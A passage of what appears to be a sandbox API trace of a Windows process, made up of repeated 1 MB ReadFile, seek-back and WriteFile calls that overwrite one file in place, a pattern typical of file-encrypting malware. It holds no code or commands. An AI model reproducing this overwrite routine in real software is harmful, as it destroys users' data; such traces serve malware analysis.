lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.849] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.868] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.869] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.871] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.897] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.897] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.899] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.915] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.916] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.918] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.938] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.938] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.940] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.963] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.963] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.965] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.987] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.987] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.997] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.010] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.010] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.012] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.031] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.031] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.033] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.097] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.097] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.098] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.150] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.150] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.152] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.187] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.187] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.189] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.216] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.216] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.219] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.281] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.281] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.283] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.306] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.306] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.308] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.324] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.324] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.326] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.342] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.342] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.345] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.391] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.391] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.398] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.459] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.459] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.461] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.527] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.528] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.538] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.561] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.562] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.563] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.580] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.580] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.582] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.597] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.597] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.599] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.610] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.611] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.613] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.626] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.626] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.629] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.773] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.773] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.775] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.815] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.815] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.817] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.833] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.833] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.839] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.856] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.865] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.868] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.882] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.882] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.884] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.900] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.900] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.902] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.915] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.915] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.917] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.932] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.932] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.934] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0047.966] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0047.966] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0047.968] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0048.009] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.009] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0048.011] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0048.023] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.023] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0048.025] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0048.040] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.040] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0048.041] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0048.054] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0048.054] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0048.056] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.056] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.056] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.059] 